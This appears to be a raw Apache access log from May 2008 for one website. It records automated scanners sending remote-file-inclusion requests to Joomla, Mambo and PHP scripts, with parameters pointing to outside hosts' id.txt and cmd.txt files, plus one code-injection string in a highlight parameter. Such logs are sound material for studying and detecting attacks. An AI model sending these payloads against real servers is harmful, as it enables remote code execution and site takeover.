203.200.95.142 - - [04/May/2008:10:40:30 -0700] "GET /logs/index.php?x=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:40:36 -0700] "GET /index.php?x=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:10:40:51 -0700] "GET /logs//include.php?path[docroot]=http://haddembr.site88.net/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:10:40:52 -0700] "GET //include.php?path[docroot]=http://haddembr.site88.net/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:40:56 -0700] "GET /logs//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 45988 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:40:59 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:41:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:41:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:41:03 -0700] "GET //?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:10:41:04 -0700] "GET /logs//include.php?path[docroot]=http://haddembr.site88.net/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:10:41:04 -0700] "GET //include.php?path[docroot]=http://haddembr.site88.net/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:41:12 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:41:13 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:41:13 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:10:41:42 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.160.180.90 - - [04/May/2008:10:41:52 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:10:41:57 -0700] "GET /logs/access_080218.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.160.178.95 - - [04/May/2008:10:42:03 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:42:12 -0700] "GET /logs/access_080215.log/page.php5?id=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:42:12 -0700] "GET /page.php5?id=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:42:12 -0700] "GET /logs/page.php5?id=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:10:42:16 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:10:42:16 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:10:42:16 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:42:28 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:42:42 -0700] "GET /logs/access_080309.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:42:52 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:10:42:52 -0700] "GET /index2.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:10:45:12 -0700] "GET /logs/access_080131.log/scanhttp://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:45:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:45:23 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:45:23 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:45:24 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:45:26 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:45:26 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:45:26 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:10:45:41 -0700] "GET /index.php?pag=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:10:45:56 -0700] "GET /logs/access_080126.log/include/statistic.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:10:45:56 -0700] "GET /include/statistic.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [04/May/2008:10:45:57 -0700] "GET /logs/access_080218.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:10:45:57 -0700] "GET /logs/include/statistic.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:46:01 -0700] "GET /logs/access_080215.log//?page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:46:06 -0700] "GET //?page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:46:07 -0700] "GET /logs//?page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 200 45988 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:10:46:19 -0700] "GET /index.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:46:52 -0700] "GET /logs/access_080312.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.193.201.57 - - [04/May/2008:10:46:54 -0700] "GET //include.php?path[docroot]=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:10:47:14 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:10:47:14 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:47:22 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:10:47:30 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:10:47:30 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:47:39 -0700] "GET //include.php?path[docroot]=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:10:47:46 -0700] "GET /logs/access_080308.log/index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:47:49 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:47:50 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:47:50 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:47:51 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:10:47:51 -0700] "GET /index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:10:47:53 -0700] "GET /logs/index.php?side=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:49:00 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:49:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:49:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.80.93.168 - - [04/May/2008:10:49:02 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.fmweb.it/images/2.png?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:49:19 -0700] "GET /logs/access_071225.log/order.php?pag=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:49:19 -0700] "GET /order.php?pag=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [04/May/2008:10:49:20 -0700] "GET /logs/order.php?pag=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:49:40 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:49:40 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.80.93.168 - - [04/May/2008:10:49:59 -0700] "GET /logs/?prefix=http://www.fmweb.it/images/2.png?? HTTP/1.1" 200 45983 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:50:01 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.80.93.168 - - [04/May/2008:10:50:03 -0700] "GET /?prefix=http://www.fmweb.it/images/2.png?? HTTP/1.1" 200 11606 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
66.80.93.168 - - [04/May/2008:10:50:23 -0700] "GET /logs/?prefix=http://www.fmweb.it/images/2.png?? HTTP/1.1" 200 45983 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
66.80.93.168 - - [04/May/2008:10:50:27 -0700] "GET /?prefix=http://www.fmweb.it/images/2.png?? HTTP/1.1" 200 11606 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:50:37 -0700] "GET /logs/access_080126.log/include/Classes.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:50:37 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:50:38 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:50:47 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:50:47 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:50:48 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:51:22 -0700] "GET /logs/access_080308.log/index.php?side=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:51:26 -0700] "GET /index.php?side=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:51:28 -0700] "GET /logs/index.php?side=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:51:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:51:39 -0700] "GET //skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:51:42 -0700] "GET /logs/access_080309.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:51:53 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [04/May/2008:10:51:53 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.7.32.9 - - [04/May/2008:10:52:01 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:52:01 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.7.32.9 - - [04/May/2008:10:52:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 200 4139 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:10:52:06 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:10:52:06 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:10:53:18 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:10:53:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:10:53:18 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:10:53:19 -0700] "GET //common/db.php?commonpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:10:53:20 -0700] "GET /logs//common/db.php?commonpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.87.96.6 - - [04/May/2008:10:54:11 -0700] "GET /solpot.html?body=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:10:54:33 -0700] "GET //common/db.php?commonpath=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:10:54:55 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:10:55:00 -0700] "GET //common/db.php?commonpath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:10:55:06 -0700] "GET /logs//common/db.php?commonpath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:10:55:16 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:10:55:16 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
141.201.80.161 - - [04/May/2008:10:55:43 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:55:43 -0700] "GET //include.php?path[docroot]=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
141.201.80.161 - - [04/May/2008:10:55:43 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
141.201.80.161 - - [04/May/2008:10:55:44 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
141.201.80.161 - - [04/May/2008:10:56:39 -0700] "GET /logs/access_080126.log/components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [04/May/2008:10:56:44 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [04/May/2008:10:56:45 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:56:54 -0700] "GET //include.php?path[docroot]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.154.122 - - [04/May/2008:10:57:28 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [04/May/2008:10:57:28 -0700] "GET //common/db.php?commonpath=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [04/May/2008:10:57:28 -0700] "GET /logs//common/db.php?commonpath=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:57:36 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:57:36 -0700] "GET /errors.php?error=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:57:36 -0700] "GET /logs/errors.php?error=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:10:57:48 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:58:41 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:10:58:41 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
